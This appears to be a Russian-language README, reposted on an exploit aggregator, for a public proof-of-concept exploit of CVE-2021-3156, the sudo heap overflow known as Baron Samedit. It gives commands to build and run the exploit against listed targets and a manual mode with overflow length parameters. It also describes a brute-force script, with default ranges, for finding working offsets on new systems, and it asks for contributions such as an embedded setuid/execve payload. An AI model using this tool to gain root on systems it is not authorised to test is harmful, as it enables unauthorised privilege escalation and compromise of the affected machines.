## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ONEOY-CVE-2021-3156
# CVE-2021-3156 PoC
## Введение
Это эксплойт для уязвимости `CVE-2021-3156` в sudo (названной Baron Samedit компанией Qualys).
## Использование
сборка:
root@kitploit:~
$ make
список целей:
root@kitploit:~
$ ./sudo-hax-me-a-sandwich
запуск:
root@kitploit:~
$ ./sudo-hax-me-a-sandwich <target_number>
ручной режим:
root@kitploit:~
$ ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>
## Поиск целей перебором (экспериментально)
Убедитесь, что у вас установлен GNU parallel.
root@kitploit:~
$ make brute
$ ./brute.sh <smash_start> <smash_end> <null_start> <null_end> <lc_start> <lc_end>
несколько значений по умолчанию для пробы:
root@kitploit:~
$ ./brute.sh 90 120 50 70 150 300
Съест все доступные ядра. Не пытайтесь совмещать Netflix и перебор.
## Вклад
Присылайте (разумные) PR — возможно, я их смержу.
Несколько идей:
* Больше целей
* Поиск целей
* Другие стратегии эксплуатации
* Более автономная функциональность:
* Встроить разделяемую библиотеку hax.c (пожалуйста, сделайте её маленькой: ELF-гольф + asm-заглушка setuid/execve)
* Добавить логику mkdir в hax.c
* Очистка каталогов/разделяемых библиотек